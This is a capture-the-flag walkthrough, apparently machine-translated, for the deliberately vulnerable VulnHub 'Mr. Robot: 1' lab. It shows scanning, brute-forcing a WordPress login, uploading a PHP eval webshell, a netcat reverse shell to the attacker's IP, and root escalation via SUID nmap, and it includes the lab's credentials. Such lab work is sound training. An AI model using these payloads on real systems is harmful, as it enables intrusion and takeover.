Shooting range download address: Mr. Robot: 1 ~ VulnHub
Directory
Shooting range download address: Mr. Robot: 1 ~ VulnHub
1. Intranet penetration
2. Port scanning
3. Scan fingerprint
4. Directory scanning
5.burp blasting
6. Trojan upload
7. Rebound shell
8. find privilege escalation
9. Summary
Experimental background: This VM has three keys hidden in different locations. Your goal is to find all three. Each key becomes harder and harder to find.
VMs are not too difficult. No advanced exploitation or reverse engineering of any kind. This level is considered Beginner-Intermediate.
Attacker IP: 192.168.179.131 kali
Target machine ip: 192.168.179.116 ubantu
Goal: Get the flag on the target machine
1. Intranet penetration
First use namp to scan the entire network segment to find out that the IP of the target machine is 192.168.179.116
2. Port Scanning
Scan all open ports, the open ports found are 80, 22, 443
According to the corresponding port, find possible vulnerabilities
3. Scan fingerprint
To download the plugin to scan fingerprint information, use the whatweb plugin that comes with Kali;
whatweb 192.168.179.116
4. Directory Scanning
Traverse the existing sites through dirb
dirb http://192.168.179.116 /usr/share/dirb/wordlists/big.txt
Take a look at several important sites, first see robots.txt, which contains flag1 and a dictionary
Access flag1 and you can see a string of characters, which looks like md5, try to decrypt but the decryption fails
Visit fsocity.dic, you can download the file, guess the user name or password
5.burp blasting
There is a login site http://192.168.179.116/wp-login in the above directory traversal, try to use the above dictionary file to blast
Just enter a username and find that there is a wrong username authentication, so you can use burp to blast the username and password in turn
First blast the user name and use the one downloaded above
A few usernames popped up
Then use the user name to deviolate the password. There are too many fonts here, and there are too many repetitions. You can deduplicate the text first, which is much faster.
Get the final username and password, go to the login page to log in, and the login is successful
-
Username: elliot
-
Password: ER28-0652
6. Trojan upload
Find a template on the page that can be customized, and upload a sentence Trojan horse
<?php @eval($_POST['code']); ?>
Remote connection with Ant Sword
7. Rebound shell
It is not easy to operate in the virtual terminal of Ant Sword, so it rebounds to Kali for operation
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2> & amp;1|nc 192.168.179.131 4444 >/tmp/f
Start nc listener on Kali
nc -lvp 4444
Make an interactive environment easy to operate
python -c 'import pty; pty.spawn("/bin/bash")'
View the files in the current directory and the current user, switch to the robot user, and found flag2 and an MD5 encrypted password
It is found that flag2 cannot be viewed and has no access rights
Decrypt the MD5 encrypted password
Get the password of the robot user, log in, and get flag2 after successful login
-
Username: robot
-
Password: abcdefghijklmnopqrstuvwxyz
8.find privilege escalation
Find the SUID permission program that can be used, you can find nmap, so use nmap to execute root permission
find / -perm -u=s -type f 2>/dev/null
Use nmap –interactive to enter the command line, then enter !sh to generate a new shell with root privileges, and find that the privilege escalation is successful, check the current directory, get flag3, and the reproduction is complete
9. Summary
-
Various uses of nmap
-
The use of burp, ant sword and other tools
-
rebound shell
-
find privilege escalation